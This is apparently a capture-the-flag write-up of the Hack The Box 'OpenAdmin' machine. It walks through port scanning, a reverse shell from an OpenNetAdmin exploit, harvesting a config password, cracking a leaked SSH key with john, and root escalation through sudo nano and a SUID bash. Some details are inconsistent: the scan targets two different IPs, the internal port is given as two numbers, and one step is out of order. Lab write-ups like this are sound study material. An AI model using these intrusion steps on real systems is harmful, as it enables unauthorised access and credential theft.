As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5insane mode, it is the fastest mode of the nmap time template.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oNsave the scan result into a file, in this case the allports file.
# Nmap 7.92 scan initiated Fri Mar 25 13:10:21 2022 as: nmap -sS -p- -T5 --min-rate 5000 -n -Pn -oN allPorts 10.10.10.171
Warning: 10.10.10.171 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.171
Host is up (0.39s latency).
Not shown: 40973 closed tcp ports (reset), 24560 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
# Nmap done at Fri Mar 25 13:10:58 2022 -- 1 IP address (1 host up) scanned in 36.82 seconds
As we see, only ports 22 (SSH) and 80 (HTTP) are open.
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p22,80 10.10.10.171 -oN targeted
-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oNsave the scan result into file, in this case the targeted file.
# Nmap 7.92 scan initiated Fri Mar 25 13:11:19 2022 as: nmap -sCV -p22,80 -oN targeted 10.10.10.171
Nmap scan report for 10.10.10.171
Host is up (0.047s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
| 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_ 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Mar 25 13:11:30 2022 -- 1 IP address (1 host up) scanned in 11.67 seconds
If we take a look at the website, we'll see the Apache2 default page.
Let's enumerate directories with gobuster.
gobuster dir -u http://10.10.10.56/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 200
dir enumerates directories or files.
-u the target URL.
-w path to the wordlist.
-t number of current threads, in this case 200 threads.
There are three different websites. Let's take a look at the /music one.
If we click on the Login button, we'll be redirected to a different web page with the OpenNetAdmin :: 0wn Your Network tittle, and it says that it is the version 18.1.1.
listening on [any] 4444 ...
connect to [10.10.14.19] from (UNKNOWN) [10.10.10.171] 57088
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
Privilege Escalation
First, let's set an interactive TTY shell.
script /dev/null -c /bin/bash
Then I press Ctrl+Z and execute the following command on my local machine:
stty raw -echo; fg
reset
Terminal type? xterm
Next, I export a few variables:
export TERM=xterm
export SHELL=bash
Finally, I run the following command in our local machine:
stty size
51 236
And set the proper dimensions in the victim machine:
stty rows 51 columns 236
We are currently in the /opt/ona/www directory, if we list the current directory, we'll see a lot of config files and folders.
ls -l
total 60
drwxrwxr-x 2 www-data www-data 4096 Jan 3 2018 config
-rw-rw-r-- 1 www-data www-data 1949 Jan 3 2018 config_dnld.php
-rw-rw-r-- 1 www-data www-data 4160 Jan 3 2018 dcm.php
drwxrwxr-x 3 www-data www-data 4096 Jan 3 2018 images
drwxrwxr-x 9 www-data www-data 4096 Jan 3 2018 include
-rw-rw-r-- 1 www-data www-data 1999 Jan 3 2018 index.php
drwxrwxr-x 5 www-data www-data 4096 Jan 3 2018 local
-rw-rw-r-- 1 www-data www-data 4526 Jan 3 2018 login.php
-rw-rw-r-- 1 www-data www-data 1106 Jan 3 2018 logout.php
drwxrwxr-x 3 www-data www-data 4096 Jan 3 2018 modules
drwxrwxr-x 3 www-data www-data 4096 Jan 3 2018 plugins
drwxrwxr-x 2 www-data www-data 4096 Jan 3 2018 winc
drwxrwxr-x 3 www-data www-data 4096 Jan 3 2018 workspace_plugins
Usually these config files have passwords or some sort of credentials. If we search for the pass word in all the files of the current directory and subdirectories, we'll find the n1nj4W4rri0R! password, in the local/config/database_settings.inc.php file.
There is the /internal folder under the /var/www directory. This means that maybe there is another website, but it is not accessible from outside. If we check the /etc/apache2/sites-available/, which has the configuration files for all the apache2 websites, we'll see the internal.conf file along with the openadmin.conf and the default-ssl.conf files.
ls -l /etc/apache2/sites-available/
total 16
-rw-r--r-- 1 root root 6338 Jul 16 2019 default-ssl.conf
-rw-r--r-- 1 root root 303 Nov 23 2019 internal.conf
-rw-r--r-- 1 root root 1329 Nov 22 2019 openadmin.conf
If we take a look at the internal.conf file, we'll see a few things. First, it is listening on the localhost on port 54846, and second, the AssignUserID is assigned to the joanna user, and the joanna group.
The mpm_itk module allows you to increase the security of the virtual hosts, making each one run with separate UIDs/GIDs.
Also, if see the /var/www/internal/main.php file, we'll see that it gets the content of the /home/joanna/.ssh/id_rsa file and print it out. As the server runs with the UID/GID of the user joanna, it can do it.
cat /var/www/internal/main.php
<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); };
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>
If we curl that file of the server hosted on the localhost on port 52846, we'll see the id_rsa file of the joanna user.
Now grab the key, paste it in the id_rsa file, and give it the right permissions.
nano idrsa && chmod 600 id_rsa
But, as we can see, the id_rsa file is encrypted. Let's get a hash that john can understand with the ssh2john tool.
ssh2john id_rsa > john_id_rsa
Now break it with john using the rockyou.txt dictionary.
john --wordlist=/usr/share/wordlists/rockyou.txt john_id_rsa
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
bloodninjas (id_rsa)
1g 0:00:00:06 DONE (2022-03-25 23:40) 0.1459g/s 1397Kp/s 1397Kc/s 1397KC/s bloodninjas..bloodmore23
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
And we get the bloodninjas password for the encrypted id_rsa file. Now we can log in as the joanna user via SSH, and then we could grab the user flag.
ssh -i id_rsa joanna@10.10.10.171
Enter passphrase for key 'id_rsa': bloodninjas
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Fri Mar 25 22:42:23 UTC 2022
System load: 0.0 Processes: 184
Usage of /: 31.0% of 7.81GB Users logged in: 0
Memory usage: 14% IP address for ens160: 10.10.10.171
Swap usage: 0%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
39 packages can be updated.
11 updates are security updates.
Last login: Tue Jul 27 06:12:07 2021 from 10.10.14.15
joanna@openadmin:~$ whoami
joanna
joanna@openadmin:~$ cat user.txt
572fcb020b9b50192e174d1c267be9ed
Let's list the sudo privileges of the joanna user.
sudo -l
-l list user privileges.
Matching Defaults entries for joanna on openadmin:
env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="XAPPLRESDIR XFILESEARCHPATH XUSERFILESEARCHPATH",
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, mail_badpass
User joanna may run the following commands on openadmin:
(ALL) NOPASSWD: /bin/nano /opt/priv
We can execute nano on the /opt/priv file as the root user. If we search for nano on the GTFOBins list, we'll see that we can execute any command as the root user.
GTFOBins is a great list of binaries that can be used to escalate privileges if you have the right permissions.
First, let's execute nano with sudo privileges on the /opt/priv file.
sudo nano /opt/priv
Then, press Ctrl+R, and then Ctrl+X to execute commands. Then execute the following command to give the SUID permission to the bash binary.
chmod u+s /bin/bash
Finally, if we exit nano, and execute bash with the owner permissions, we'll get a shell as root, and all we have to do is reap the harvest and take the root flag.
If we take a look at the , we'll see that we have to execute it, indicating the URL of the OpenNetAdmin web page. We'll see that this exploit allows us to run commands.
